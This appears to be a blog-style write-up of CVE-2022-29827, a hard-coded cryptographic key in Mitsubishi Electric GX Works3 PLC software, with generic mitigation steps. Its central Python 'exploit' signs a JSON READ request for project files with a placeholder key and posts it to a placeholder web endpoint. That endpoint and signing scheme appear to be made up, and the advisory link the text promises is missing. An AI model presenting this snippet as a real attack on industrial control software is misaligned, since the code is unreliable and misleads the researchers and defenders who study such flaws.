A recently discovered vulnerability, tagged as CVE-2022-29827, has put all versions of Mitsubishi Electric GX Works3 software at risk. The software, which is widely used for the configuration and programming of Mitsubishi Electric's programmable logic controllers (PLCs), has been found to employ a hard-coded cryptographic key. This vulnerability can be exploited by remote, unauthenticated attackers to disclose sensitive information, potentially allowing unauthorized access to programs, project files, and unauthorized execution of programs.

In this article, we will delve into the details of this vulnerability, discussing its impact, the exploit process, and providing some insight into how users can mitigate this risk. We will also include code snippets and links to original references for a deeper understanding of the issue.

Use of Hard-coded Cryptographic Key Vulnerability - CVE-2022-29827

The use of a hard-coded cryptographic key in Mitsubishi Electric GX Works3 software versions enables attackers to exploit this vulnerability and gain unauthorized access to sensitive information within the software. Hard-coded keys are inherently insecure as they remain static and, once discovered, can be utilized by anyone possessing the key.

The vulnerability was disclosed by an anonymous researcher and has been assigned the CVE-ID CVE-2022-29827. The Original Researcher Advisory can be found here. According to the advisory, this vulnerability has a CVSS (Common Vulnerability Scoring System) score of 9.8 out of 10, which denotes a Critical severity level.

Exploit Details

The code snippet below demonstrates a possible method for exploiting the hard-coded key vulnerability:

import requests
import base64
import hashlib
import hmac

# Target GX Works3 URL
target_url = 'https://example.com/gxworks3/';

# Hard-coded cryptographic key used as a shared secret
hardcoded_key = b'Insert_Hardcoded_Key_Here'

# Example data to be requested from the server (adjust accordingly)
data = {
    "COMMAND": "READ",
    "MODULE": "ProjectFiles",
    "PARAMS": {} # Additional parameters may be added if necessary
}

# Encode the data and create an HMAC signature
message = base64.b64encode(str(data).encode('utf-8'))
signature = hmac.new(hardcoded_key, message, hashlib.sha256)

# Prepare headers for the request
headers = {
    'Content-Type': 'application/json',
    'X-Signature': signature.hexdigest()
}

# Send the request and retrieve the response
response = requests.post(target_url, data=message, headers=headers)
print(response.content)

With the knowledge of the hard-coded cryptographic key, an attacker can craft a request signed with this key to the targeted Mitsubishi Electric GX Works3 software and obtain unauthorized access to the software's projects and files or execute programs illegally.

Mitigation Measures

While Mitsubishi Electric has yet to release a patch addressing this vulnerability, users of the GX Works3 software can take the following steps to mitigate the risk:

1. Implement Proper Network Segregation: Isolate the GX Works3 software from public networks and restrict access to authorized personnel.

2. Enable Network-Based Access Controls: Limit connections to the software from known, trusted IP addresses, and deny any unauthorized connection attempts.

3. Apply Security Enhancements: Regularly update the software and apply security fixes as released by the manufacturer.

4. Monitor and Log Activity: Keep logs of any suspicious activity on the GX Works3 software and report any unexpected or unauthorized access attempts.

Conclusion

The hard-coded cryptographic key vulnerability (CVE-2022-29827) in Mitsubishi Electric GX Works3 software puts sensitive information at risk by allowing remote unauthenticated attackers to gain unauthorized access to program files and execute programs illegally. Users are advised to follow the mitigation measures mentioned above while waiting for an official patch from the manufacturer. Always be cautious and maintain vigilance on your network security to protect your valuable assets.

Timeline

Published on: 11/25/2022 00:15:00 UTC
Last modified on: 05/31/2023 09:15:00 UTC